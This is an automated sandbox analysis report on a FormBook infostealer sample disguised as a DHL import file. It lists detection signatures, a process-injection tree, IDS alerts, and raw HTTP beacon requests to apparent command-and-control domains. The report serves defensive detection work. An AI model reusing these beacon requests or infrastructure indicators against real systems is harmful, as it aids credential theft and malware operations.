Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_IMPORT_8236820594.exe

Overview

General Information

Sample name:DHL_IMPORT_8236820594.exe
Analysis ID:1547007
MD5:2f01c94df712e58b8227588ba7a376c6
SHA1:05b93bdaf9c8bdb42e6888e2f1d292ad1b9bc908
SHA256:5a8b2ff82ebbee4b3d5baf85be0af29029669da8c2cde057affaca52c5c94fc0
Tags:dhlexegeoROUuser-NDA0E
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Update Standalone Installer command line found (may be used to bypass UAC)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DHL_IMPORT_8236820594.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe" MD5: 2F01C94DF712E58B8227588BA7A376C6)
    • svchost.exe (PID: 3448 cmdline: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • AUHJGnjYgKTjWw.exe (PID: 6016 cmdline: "C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wusa.exe (PID: 6260 cmdline: "C:\Windows\SysWOW64\wusa.exe" MD5: EB96F0F207F203DD0B6D8A2625270495)
        • net.exe (PID: 2588 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • AUHJGnjYgKTjWw.exe (PID: 4340 cmdline: "C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ParentImage: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, ParentProcessId: 7028, ParentProcessName: DHL_IMPORT_8236820594.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ProcessId: 3448, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ParentImage: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe, ParentProcessId: 7028, ParentProcessName: DHL_IMPORT_8236820594.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe", ProcessId: 3448, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T19:43:05.133750+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449730TCP
                2024-11-01T19:43:44.039474+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449736TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T19:44:02.875031+010028554641A Network Trojan was detected192.168.2.449822188.114.96.380TCP
                2024-11-01T19:44:05.578168+010028554641A Network Trojan was detected192.168.2.449836188.114.96.380TCP
                2024-11-01T19:44:08.172209+010028554641A Network Trojan was detected192.168.2.449853188.114.96.380TCP
                2024-11-01T19:44:16.407692+010028554641A Network Trojan was detected192.168.2.4499003.33.130.19080TCP
                2024-11-01T19:44:18.981201+010028554641A Network Trojan was detected192.168.2.4499163.33.130.19080TCP
                2024-11-01T19:44:21.525519+010028554641A Network Trojan was detected192.168.2.4499323.33.130.19080TCP
                2024-11-01T19:44:30.546887+010028554641A Network Trojan was detected192.168.2.449981154.23.184.9580TCP
                2024-11-01T19:44:33.109508+010028554641A Network Trojan was detected192.168.2.449996154.23.184.9580TCP
                2024-11-01T19:44:35.609511+010028554641A Network Trojan was detected192.168.2.450011154.23.184.9580TCP
                2024-11-01T19:44:44.513285+010028554641A Network Trojan was detected192.168.2.450016172.67.185.2280TCP
                2024-11-01T19:44:47.090485+010028554641A Network Trojan was detected192.168.2.450017172.67.185.2280TCP
                2024-11-01T19:44:49.639229+010028554641A Network Trojan was detected192.168.2.450018172.67.185.2280TCP
                2024-11-01T19:44:58.423225+010028554641A Network Trojan was detected192.168.2.450020206.119.82.17280TCP
                2024-11-01T19:45:00.987680+010028554641A Network Trojan was detected192.168.2.450021206.119.82.17280TCP
                2024-11-01T19:45:03.578156+010028554641A Network Trojan was detected192.168.2.450022206.119.82.17280TCP
                2024-11-01T19:45:21.875133+010028554641A Network Trojan was detected192.168.2.450024103.191.208.13780TCP
                2024-11-01T19:45:24.423787+010028554641A Network Trojan was detected192.168.2.450025103.191.208.13780TCP
                2024-11-01T19:45:26.984652+010028554641A Network Trojan was detected192.168.2.450026103.191.208.13780TCP
                2024-11-01T19:45:36.437601+010028554641A Network Trojan was detected192.168.2.4500283.111.160.21680TCP
                2024-11-01T19:45:38.984458+010028554641A Network Trojan was detected192.168.2.4500293.111.160.21680TCP
                2024-11-01T19:45:41.671964+010028554641A Network Trojan was detected192.168.2.4500303.111.160.21680TCP
                2024-11-01T19:45:50.047522+010028554641A Network Trojan was detected192.168.2.450032203.161.49.19380TCP
                2024-11-01T19:45:52.949936+010028554641A Network Trojan was detected192.168.2.450033203.161.49.19380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: DHL_IMPORT_8236820594.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: DHL_IMPORT_8236820594.exeReversingLabs: Detection: 63%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: DHL_IMPORT_8236820594.exeJoe Sandbox ML: detected
                Source: DHL_IMPORT_8236820594.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wusa.pdbGCTL source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wusa.pdb source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AUHJGnjYgKTjWw.exe, 00000005.00000000.2012569159.000000000073E000.00000002.00000001.01000000.00000005.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3517387666.000000000073E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008468EE FindFirstFileW,FindClose,0_2_008468EE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0084698F
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0083D076
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0083D3A9
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00849642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00849642
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084979D
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0083DBBE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00849B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00849B2B
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00845C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00845C97
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0049C980 FindFirstFileW,FindNextFileW,FindClose,7_2_0049C980
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax7_2_00489DE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h7_2_02BF04EB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49916 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49932 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49996 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 172.67.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 172.67.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 206.119.82.172:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 172.67.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 3.111.160.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 3.111.160.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 3.111.160.216:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.iuyi542.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0084CE44
                Source: global trafficHTTP traffic detected: GET /b6lw/?XbDhGVR=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.iuyi542.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficHTTP traffic detected: GET /o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus+09XFbP+3c72g6WMTcCeHGHsKE18csM01zHbC+82zyOO8bx37pnUbuImGHRIRsUOfuHIGVgprfqSQRJiadd1v3E=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.vrxlzluy.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficHTTP traffic detected: GET /3c6w/?XbDhGVR=FJ83cOvFWEccIB8Y6SCsBqJgMlFSJUXICv/nsL67hA7PUBbPcYUeOgrdyaqmH9Z1A+LVMRCMzG0eJtFhxlj35v5UnzdVcRI8ETGcI3l1N4u34k5Wtd8PhNs=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.trifecta.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficHTTP traffic detected: GET /rj0s/?XbDhGVR=wwfrpq2GStq8yXhruzchqPI2DPKMclx/34kF3CMx+1v+TSw3PCRza/Sx++Q9wxTideP8HMqKtaf0MdZtX7Zp7/WG/Y2BEJVTn7MuHEHfS2P/6TB7VaKsbng=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.wcp95.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficHTTP traffic detected: GET /xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.gokulmohan.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficHTTP traffic detected: GET /a3g3/?XbDhGVR=wGzSOeLMOeJZKE1qNEa+jhNIWFM/28bU2ce+YDYhk9OHSMfA8Wvg3+EpArxXMTGJwIf87CGML3FOIiYWeXpTMV044XgXGpvZX0LmL4PHT1yh05kop8D3Fas=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.wddb97.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                Source: global trafficHTTP traffic detected: GET /3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1Host: www.roopiedutech.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
